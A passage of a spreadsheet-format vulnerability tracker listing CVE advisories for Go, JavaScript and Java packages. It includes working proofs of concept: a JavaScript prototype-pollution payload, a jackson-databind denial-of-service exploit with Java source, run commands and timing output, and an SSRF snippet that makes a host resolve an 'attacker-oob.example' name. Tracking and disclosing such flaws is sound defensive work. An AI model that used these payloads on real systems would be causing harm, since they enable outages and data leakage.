const assert = require("node:assert/strict");
const { scimPatch } = require("./lib/src/scimPatch");
const victim = {
  schemas: ["urn:ietf:params:scim:schemas:core:2.0:User"],
  userName: "alice",
  active: true,
  emails: [{ value: "alice@example.com", primary: true }],
  meta: { created: "x", lastModified: "x", resourceType: "User" }
};
try {
  assert.equal(({}).toString.scimPatchPolluted, undefined);
  scimPatch(victim, [
    { op: "add", path: "toString.scimPatchPolluted", value: "polluted" }
  ]);
  assert.equal(({}).toString.scimPatchPolluted, "polluted");
  console.log(({}).toString.scimPatchPolluted);
} finally {
  delete Object.prototype.toString.scimPatchPolluted;
}
```
Output:
```text
polluted
```
A no-path operation with a dotted value key is also affected:
```js
scimPatch(victim, [
  { op: "add", value: { "toString.noPathPolluted": "polluted" } }
]);
```
## Remediation
Do not traverse inherited properties while resolving patch paths. Use own-property checks such as `Object.hasOwn(obj, key)` and create missing containers only for safe own keys.
Keep the existing denylist for `__proto__`, `constructor`, and `prototype` as defense in depth.</t>
        </is>
      </c>
      <c r="T339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61834</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63199</t>
        </is>
      </c>
      <c r="D340" s="5" t="inlineStr"/>
      <c r="E340" s="5" t="inlineStr"/>
      <c r="F340" s="5" t="inlineStr"/>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="inlineStr"/>
      <c r="I340" s="5" t="inlineStr"/>
      <c r="J340" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K340" s="5" t="inlineStr"/>
      <c r="L340" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/perses/perses</t>
        </is>
      </c>
      <c r="M340" s="5" t="inlineStr">
        <is>
          <t>0.54.0-rc.0</t>
        </is>
      </c>
      <c r="N340" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O340" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P340" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q340" s="5" t="inlineStr"/>
      <c r="R340" s="5" t="inlineStr"/>
      <c r="S340" s="5" t="inlineStr">
        <is>
          <t>Perses's missing authorization in datasource proxy allows cross-scope secret disclosure in github.com/perses/perses</t>
        </is>
      </c>
      <c r="T340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63199</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63405</t>
        </is>
      </c>
      <c r="D341" s="5" t="inlineStr"/>
      <c r="E341" s="5" t="inlineStr"/>
      <c r="F341" s="5" t="inlineStr"/>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="inlineStr"/>
      <c r="I341" s="5" t="inlineStr"/>
      <c r="J341" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K341" s="5" t="inlineStr"/>
      <c r="L341" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/anycable/anycable-go</t>
        </is>
      </c>
      <c r="M341" s="5" t="inlineStr"/>
      <c r="N341" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O341" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P341" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q341" s="5" t="inlineStr"/>
      <c r="R341" s="5" t="inlineStr"/>
      <c r="S341" s="5" t="inlineStr">
        <is>
          <t>AnyCable: Pusher REST API Does Not Verify Request Body MD5 Enabling Signed-Request Replay with Arbitrary Body in github.com/anycable/anycable-go.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github.com/anycable/anycable-go before v1.6.15.</t>
        </is>
      </c>
      <c r="T341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63405</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63406</t>
        </is>
      </c>
      <c r="D342" s="5" t="inlineStr"/>
      <c r="E342" s="5" t="inlineStr"/>
      <c r="F342" s="5" t="inlineStr"/>
      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="inlineStr"/>
      <c r="I342" s="5" t="inlineStr"/>
      <c r="J342" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K342" s="5" t="inlineStr"/>
      <c r="L342" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/anycable/anycable-go</t>
        </is>
      </c>
      <c r="M342" s="5" t="inlineStr"/>
      <c r="N342" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O342" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P342" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q342" s="5" t="inlineStr"/>
      <c r="R342" s="5" t="inlineStr"/>
      <c r="S342" s="5" t="inlineStr">
        <is>
          <t>AnyCable: Telemetry Subsystem Contains Hardcoded Authentication Token and Transmits CLI Arguments Including Secrets in github.com/anycable/anycable-go.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github.com/anycable/anycable-go before v1.6.15.</t>
        </is>
      </c>
      <c r="T342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63406</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63445</t>
        </is>
      </c>
      <c r="D343" s="5" t="inlineStr"/>
      <c r="E343" s="5" t="inlineStr"/>
      <c r="F343" s="5" t="inlineStr"/>
      <c r="G343" s="5" t="inlineStr"/>
      <c r="H343" s="5" t="inlineStr"/>
      <c r="I343" s="5" t="inlineStr"/>
      <c r="J343" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K343" s="5" t="inlineStr"/>
      <c r="L343" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/perses/perses</t>
        </is>
      </c>
      <c r="M343" s="5" t="inlineStr">
        <is>
          <t>0.54.0-rc.0</t>
        </is>
      </c>
      <c r="N343" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O343" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P343" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q343" s="5" t="inlineStr"/>
      <c r="R343" s="5" t="inlineStr"/>
      <c r="S343" s="5" t="inlineStr">
        <is>
          <t>Perses's unvalidated project parameter enables filesystem path traversal in github.com/perses/perses</t>
        </is>
      </c>
      <c r="T343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63445</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63458</t>
        </is>
      </c>
      <c r="D344" s="5" t="inlineStr"/>
      <c r="E344" s="5" t="inlineStr"/>
      <c r="F344" s="5" t="inlineStr"/>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="inlineStr"/>
      <c r="I344" s="5" t="inlineStr"/>
      <c r="J344" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K344" s="5" t="inlineStr"/>
      <c r="L344" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/perses/perses</t>
        </is>
      </c>
      <c r="M344" s="5" t="inlineStr">
        <is>
          <t>0.54.0-beta.3</t>
        </is>
      </c>
      <c r="N344" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O344" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P344" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q344" s="5" t="inlineStr"/>
      <c r="R344" s="5" t="inlineStr"/>
      <c r="S344" s="5" t="inlineStr">
        <is>
          <t>Perses's project query parameter authorization bypass exposes cross-project resources in github.com/perses/perses</t>
        </is>
      </c>
      <c r="T344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63458</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6673</t>
        </is>
      </c>
      <c r="D345" s="5" t="inlineStr"/>
      <c r="E345" s="5" t="inlineStr"/>
      <c r="F345" s="5" t="inlineStr"/>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="inlineStr"/>
      <c r="I345" s="5" t="inlineStr"/>
      <c r="J345" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K345" s="5" t="inlineStr"/>
      <c r="L345" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="M345" s="5" t="inlineStr">
        <is>
          <t>10.11.18+incompatible, 11.5.6+incompatible, 11.6.3+incompatible, 11.7.1+incompatible</t>
        </is>
      </c>
      <c r="N345" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O345" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P345" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q345" s="5" t="inlineStr"/>
      <c r="R345" s="5" t="inlineStr"/>
      <c r="S345" s="5" t="inlineStr">
        <is>
          <t>Mattermost doesn't authenticate Atlassian Connect installed callbacks, allowing a remote unauthenticated attacker to inject a rogue sharedSecret in github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="T345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6673</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68497</t>
        </is>
      </c>
      <c r="D346" s="5" t="inlineStr"/>
      <c r="E346" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F346" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="inlineStr"/>
      <c r="I346" s="5" t="inlineStr"/>
      <c r="J346" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K346" s="5" t="inlineStr"/>
      <c r="L346" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M346" s="5" t="inlineStr">
        <is>
          <t>2.18.10, 2.21.6, 2.22.2, 3.1.6, 3.2.2</t>
        </is>
      </c>
      <c r="N346" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O346" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P346" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q346" s="5" t="inlineStr"/>
      <c r="R346" s="5" t="inlineStr"/>
      <c r="S346" s="5" t="inlineStr">
        <is>
          <t>### Summary
`jackson-databind` 3.2.1 deserializes a JSON **string** bound to a `javax.xml.datatype.Duration` or `javax.xml.datatype.XMLGregorianCalendar` field by passing the raw string verbatim to `DatatypeFactory.newDuration(value)` / `newXMLGregorianCalendar(value)`. Per the XML-Schema lexical grammar these factory methods accept numeric components of arbitrary length, which the JDK materializes into `java.math.BigInteger` / `BigDecimal` using the native `BigInteger(String)` constructor (an O(n²) parser). Because the digits reside inside a JSON **string** token, jackson-core's `StreamReadConstraints.maxNumberLength` guard (which bounds only JSON *number* tokens) never fires, so there is no length limit anywhere on this path. An unauthenticated attacker can submit a single small request (e.g. ~1–5 MB) that forces tens of seconds to minutes of single-thread CPU consumption, yielding a denial of service under the default `JsonMapper.builder().build()` mapper with no polymorphic typing or special configuration.
### Details
`StreamReadConstraints.maxNumberLength` (jackson-core, default 1000) bounds the **text length of JSON number tokens** only; it does not apply to digits inside a JSON string token (`maxStringLength` default is 100,000,000). jackson's own value binders compensate for this gap elsewhere — `NumberDeserializers` explicitly call `streamReadConstraints().validateIntegerLength(text.length())` / `validateFPLength(text.length())` before parsing a *stringified* number (`NumberDeserializers.java:1063`, `:1139`). The XML-datatype deserializer omits this identical pre-check.
`CoreXMLDeserializers` registers `Std` deserializers **by default** for any field typed `javax.xml.datatype.Duration` or `XMLGregorianCalendar` (`findBeanDeserializer`), with no opt-in required. `Std._deserialize` hands the attacker string straight to the datatype factory:
```java
protected Object _deserialize(String value, DeserializationContext ctxt) {
    switch (_kind) {
    case TYPE_DURATION:
        return _dataTypeFactory.newDuration(value);                 // attacker lexical string
    case TYPE_G_CALENDAR:
        Date d;
        try { d = _parseDate(value, ctxt); }
        catch (DatabindException e) {
            return _dataTypeFactory.newXMLGregorianCalendar(value); // attacker lexical string
        }
        return _gregorianFromDate(ctxt, d);
    }
    throw new IllegalStateException();
}
```
Per the XSD lexical rules, `newDuration` parses each numeric component (years, months, …) into a `BigInteger`, and `newXMLGregorianCalendar` parses fractional seconds into a `BigDecimal`. The JDK uses the native `BigInteger(String)` / `BigDecimal(String)` constructors, which are O(n²) in the digit count. A short JSON string such as `"P" + "9"×N + "Y"` therefore forces the allocation and O(N²) parse of an N-digit `BigInteger`, entirely downstream of every jackson-core constraint.
## Vulnerable Code Location
- `src/main/java/tools/jackson/databind/ext/CoreXMLDeserializers.java:137`
  — `newDuration(value)` (TYPE_DURATION)
- `src/main/java/tools/jackson/databind/ext/CoreXMLDeserializers.java:147`
  — `newXMLGregorianCalendar(value)` (TYPE_G_CALENDAR fallback)
- Registration (default, no opt-in):
  `src/main/java/tools/jackson/databind/ext/CoreXMLDeserializers.java:42-46`
  (`findBeanDeserializer` returns `Std` for `XMLGregorianCalendar` / `Duration`)
- Contrast — correct length-guard pattern already used elsewhere in the library:
  `src/main/java/tools/jackson/databind/deser/jdk/NumberDeserializers.java:1063,1139`
## Proof of Concept
PoC source (`Vuln07_DurationDoS.java`). It uses only the public `ObjectMapper.readValue` API and a default mapper; the only "special" element is a normal DTO exposing a `javax.xml.datatype.Duration` field.
```java
package com.poc;
import tools.jackson.databind.ObjectMapper;
import tools.jackson.databind.json.JsonMapper;
import javax.xml.datatype.Duration;
/**
 * Vuln 7: Unbounded numeric allocation / CPU DoS via Duration lexical deserialization.
 * A short JSON string forces parsing of a huge BigInteger inside DatatypeFactory.newDuration.
 */
public class Vuln07_DurationDoS {
    public static class Cfg { public Duration ttl; }
    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = JsonMapper.builder().build();
        int digits = Integer.getInteger("digits", 5_000_000);
        // Baseline small parse.
        long t0 = System.nanoTime();
        mapper.readValue("{\"ttl\":\"P1Y\"}", Cfg.class);
        long tBase = System.nanoTime() - t0;
        System.out.println("Baseline (P1Y) parse: " + (tBase/1_000_000) + " ms");
        String big = "P" + "9".repeat(digits) + "Y";
        String json = "{\"ttl\":\"" + big + "\"}";
        System.out.println("Payload JSON size ~ " + json.length() + " bytes (year component = " + digits + " digits)");
        long t1 = System.nanoTime();
        try {
            Cfg c = mapper.readValue(json, Cfg.class);
            long dt = System.nanoTime() - t1;
            System.out.println("Parsed giant Duration in " + (dt/1_000_000) + " ms; years field type materialized as BigInteger");
            System.out.println("RESULT: VULNERABLE - " + digits + "-digit BigInteger parsed from a "
                    + json.length() + "-byte payload (amplified CPU/allocation, StreamReadConstraints bypassed)");
        } catch (Throwable t) {
            long dt = System.nanoTime() - t1;
            System.out.println("After " + (dt/1_000_000) + " ms threw " + t.getClass().getName() + ": " + t.getMessage());
        }
    }
}
```
Minimal HTTP-shaped payload (what an attacker sends):
```json
{ "ttl": "P99999999999999999999…9Y" }   // 'P' + N nines + 'Y', N up to ~100,000,000
```
An `XMLGregorianCalendar` field is equally affected via the fractional-seconds path, e.g.
`{ "at": "0000-01-01T00:00:00." + "9"×N }`.
## Execution Steps
The PoC needs only the three Jackson 3.2.1 jars on the classpath; it can be built and run with plain `javac`/`java` (no Maven required). The jars are the standard published artifacts (here resolved from the local Maven cache `~/.m2`, but any copy works).
```bash
# 0. Locate the three dependency jars (published Maven artifacts).
M2="$HOME/.m2/repository"
DB="$M2/tools/jackson/core/jackson-databind/3.2.1/jackson-databind-3.2.1.jar"
CORE="$M2/tools/jackson/core/jackson-core/3.2.1/jackson-core-3.2.1.jar"
ANN="$M2/com/fasterxml/jackson/core/jackson-annotations/2.22/jackson-annotations-2.22.jar"
CP="$DB:$CORE:$ANN"
#   If not already cached, fetch them once, e.g.:
#   mvn -q dependency:get -Dartifact=tools.jackson.core:jackson-databind:3.2.1
#   (jackson-core 3.2.1 and jackson-annotations 2.22 come as transitive deps)
# 1. Compile with javac (single source file).
mkdir -p out
javac -cp "$CP" -d out src/main/java/com/poc/Vuln07_DurationDoS.java
# 2. Quick confirmation (~11 s): 1,000,000-digit year component.
java -Xmx2g -Ddigits=1000000 -cp "out:$CP" com.poc.Vuln07_DurationDoS
# 3. Full-severity demonstration (~293 s): 5,000,000-digit year component.
java -Xmx2g -Ddigits=5000000 -cp "out:$CP" com.poc.Vuln07_DurationDoS
```
The `digits` system property controls the number of `9` characters in the year component; JSON payload size ≈ digits + 12 bytes. Increase toward the default 100,000,000 `maxStringLength` to scale cost further.
Environment used for the evidence below: jackson-databind 3.2.1, jackson-core 3.2.1, jackson-annotations 2.22; OpenJDK 25 on macOS (darwin), default `JsonMapper.builder().build()`.
## Reproduction Evidence
Deterministic values (payload byte count, resulting bit-length) are exact across runs; timings vary with load. Two independent runs at different sizes:
**digits = 5,000,000 (~5 MB payload):**
```
Baseline (P1Y) parse: 27 ms
Payload JSON size ~ 5000012 bytes (year component = 5000000 digits)
Parsed giant Duration in 293175 ms; years field type materialized as BigInteger
RESULT: VULNERABLE - 5000000-digit BigInteger parsed from a 5000012-byte payload (amplified CPU/allocation, StreamReadConstraints bypassed)
```
**digits = 1,000,000 (~1 MB payload, for fast repeatability):**
```
Baseline (P1Y) parse: 53 ms
Payload JSON size ~ 1000012 bytes (year component = 1000000 digits)
Parsed giant Duration in 11155 ms; years field type materialized as BigInteger
RESULT: VULNERABLE - 1000000-digit BigInteger parsed from a 1000012-byte payload (amplified CPU/allocation, StreamReadConstraints bypassed)
```
Interpretation: a normal `"P1Y"` value parses in tens of milliseconds; a ~1 MB attacker payload consumes **~11 s** and a ~5 MB payload **~293 s** of single-thread CPU — a 5–6 order-of-magnitude amplification. The super-linear growth (≈26× cost for 5× payload) is consistent with the JDK's O(n²) `BigInteger(String)` constructor. The cost occurs inside `DatatypeFactory.newDuration`, downstream of jackson-core's `StreamReadConstraints` (independently confirmed: the same digit sequence supplied as a bare JSON *number* token is rejected with `StreamConstraintsException`, whereas inside a string token it is not bounded).
## Impact
An unauthenticated attacker can stall a request-processing thread for tens of seconds to minutes and allocate a large `BigInteger`/`BigDecimal` from a single small request. Because the cost is CPU-bound and super-linear, a handful of concurrent requests can saturate the server's worker threads and CPU, denying service to all users. The exposure requires only that a bound type expose a `javax.xml.datatype.Duration` or `XMLGregorianCalendar` field  common in applications that ingest XML-schema derived data, SOAP/JAXB-adjacent models, or configuration carrying XSD durations — and fires under the default mapper with no polymorphic typing.
## Recommended Fix
Apply the same validate-length-then-parse idiom the core `NumberDeserializers` already use:
1. In `CoreXMLDeserializers.Std._deserialize`, enforce a maximum raw-string length before
   calling `newDuration(value)` / `newXMLGregorianCalendar(value)` — e.g. reject inputs
   longer than `ctxt.streamReadConstraints().getMaxNumberLength()` (or a dedicated bound),
   routing over-length input through `ctxt.handleWeirdStringValue(...)`.
2. Alternatively, validate the lexical form against a bounded regex and cap the digit count
   of each numeric component before delegating to `DatatypeFactory`.
3. Document that `Duration` / `XMLGregorianCalendar` fields bound from untrusted input must
   be length-limited at the transport layer.</t>
        </is>
      </c>
      <c r="T346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68497</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71485</t>
        </is>
      </c>
      <c r="D347" s="5" t="inlineStr"/>
      <c r="E347" s="5" t="inlineStr"/>
      <c r="F347" s="5" t="inlineStr"/>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="inlineStr"/>
      <c r="I347" s="5" t="inlineStr"/>
      <c r="J347" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K347" s="5" t="inlineStr"/>
      <c r="L347" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/centrifugal/centrifugo, Go:github.com/centrifugal/centrifugo/v3, Go:github.com/centrifugal/centrifugo/v4, Go:github.com/centrifugal/centrifugo/v5, Go:github.com/centrifugal/centrifugo/v6</t>
        </is>
      </c>
      <c r="M347" s="5" t="inlineStr">
        <is>
          <t>6.9.0</t>
        </is>
      </c>
      <c r="N347" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O347" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P347" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q347" s="5" t="inlineStr"/>
      <c r="R347" s="5" t="inlineStr"/>
      <c r="S347" s="5" t="inlineStr">
        <is>
          <t>Centrifugo: Client-forgeable headers emulation lets any client spoof headers forwarded to proxy backends in github.com/centrifugal/centrifugo</t>
        </is>
      </c>
      <c r="T347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71485</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77310</t>
        </is>
      </c>
      <c r="D348" s="5" t="inlineStr"/>
      <c r="E348" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F348" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="inlineStr"/>
      <c r="I348" s="5" t="inlineStr"/>
      <c r="J348" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K348" s="5" t="inlineStr"/>
      <c r="L348" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M348" s="5" t="inlineStr">
        <is>
          <t>2.18.9, 2.21.5, 2.22.1, 3.1.5, 3.2.1</t>
        </is>
      </c>
      <c r="N348" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O348" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P348" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q348" s="5" t="inlineStr"/>
      <c r="R348" s="5" t="inlineStr"/>
      <c r="S348" s="5" t="inlineStr">
        <is>
          <t>### Summary
CVE-2026-54514 (GHSA-hgj6-7826-r7m5) fixed an eager-DNS-resolution / SSRF issue in jackson-databind's deserialization of `java.net.InetSocketAddress` by switching to `InetSocketAddress.createUnresolved(...)` (PR #5951, commit 1f5a1037, released in 2.18.8 / 2.21.4 / 3.1.4). That fix did not cover the sibling `java.net.InetAddress` branch in the very same `FromStringDeserializer.Std._deserialize()` switch statement, which still calls `InetAddress.getByName(value)` and therefore performs an eager forward DNS lookup on attacker-controlled input at deserialization time. The fix is incomplete: the same vulnerability class remains reachable through `InetAddress`.
### Details
File: src/main/java/com/fasterxml/jackson/databind/deser/std/FromStringDeserializer.java
Sibling cases in the same switch:
- Line 357-358 (UNFIXED):
    case STD_INET_ADDRESS:
        return InetAddress.getByName(value);     // eager forward DNS lookup
- Line 359-381 + helper at 494-496 (FIXED by PR #5951):
    protected InetSocketAddress _inetSocketAddress(String host, int port) {
        // 05-May-2026, tatu: [databind#5951] Prevent DNS lookup:
        return InetSocketAddress.createUnresolved(host, port);   // no DNS
    }
`InetAddress` is a registered standard string-like scalar type (FromStringDeserializer.types() line 73; findDeserializer() maps it to STD_INET_ADDRESS at line 119-120). Any value deserialized into an `InetAddress`-typed target — a plain POJO field, a polymorphic subtype, or a default-typing-permitted slot — reaches `InetAddress.getByName(attackerControlledString)`, which invokes the OS/JVM resolver and performs forward DNS resolution before any application validation.
The parent fix's own added unit test asserts `address.isUnresolved()` with the comment "should NOT resolve address", confirming that performing DNS resolution during deserialization is precisely the behavior being treated as the vulnerability. The InetAddress branch still violates that property.
Verified against the FIXED released artifact (jackson-databind 2.18.8, from Maven Central): decompiled bytecode shows the InetSocketAddress branch now routes through `_inetSocketAddress -&gt; createUnresolved`, while `InetAddress.getByName` is still emitted unchanged in the InetAddress branch.
### PoC
Lab-only, zero network egress. Run against the fixed jackson-databind 2.18.8.
A custom JDK InetAddressResolver SPI (Java 18+) counts forward lookups locally and answers with loopback, so no traffic leaves the host:
    ObjectMapper m = new ObjectMapper();
    // InetSocketAddress (patched): 0 resolver lookups, isUnresolved=true
    m.readValue("\"internal-metadata.attacker-oob.example:8080\"", InetSocketAddress.class);
    // InetAddress (unpatched sibling): 1 resolver lookup on the attacker host
    m.readValue("\"internal-metadata.attacker-oob.example\"", InetAddress.class);
Observed output (jackson 2.18.8):
    [A] InetSocketAddress  isUnresolved=true  resolverLookups=0  lastHost=null
    [B] InetAddress        value=localhost/127.0.0.1  resolverLookups=1  lastHost=internal-metadata.attacker-oob.example
A standalone variant (no SPI) using an RFC-6761 `.invalid` canary host shows the same: deserializing into InetAddress raises UnknownHostException (the OS resolver was invoked), while InetSocketAddress stays unresolved. Full source in PocResolverCount.java and PocInetAddressIncompleteFix.java.
Reachability with a plain field (no annotations, no polymorphism, no default typing):
    static class Config { public InetAddress bindHost; public int port; }
    mapper.readValue("{\"bindHost\":\"poc-reach.example\",\"port\":1}", Config.class);
    // -&gt; resolver invoked on "poc-reach.example"
### Impact
An attacker who can influence JSON deserialized into an `InetAddress` target can force the application to perform outbound forward DNS lookups for attacker-chosen hostnames at deserialization time, before any application-level validation. This yields a DNS-based SSRF / OOB primitive: out-of-band exfiltration / interaction via DNS callbacks, and blind probing of whether internal hostnames resolve (internal-host enumeration). This is the same impact class and trust boundary for which CVE-2026-54514 (CVSS 5.3, CWE-918) was assigned to the InetSocketAddress branch. It is a DNS-lookup / blind SSRF primitive, not arbitrary HTTP SSRF or RCE; it does not itself open a socket.
Suggested fix: avoid eager resolution for InetAddress as well — e.g. defer resolution, validate the host string before resolving, or provide an opt-in/opt-out consistent with the InetSocketAddress fix (there is no direct unresolved-InetAddress equivalent, so deferring/validating or documenting the resolution is the practical mitigation).
Credit : Ta Duc Thien</t>
        </is>
      </c>
      <c r="T348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77310</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77339</t>
        </is>
      </c>
      <c r="D349" s="5" t="inlineStr"/>
      <c r="E349" s="5" t="inlineStr"/>
      <c r="F349" s="5" t="inlineStr"/>
      <c r="G349" s="5" t="inlineStr"/>
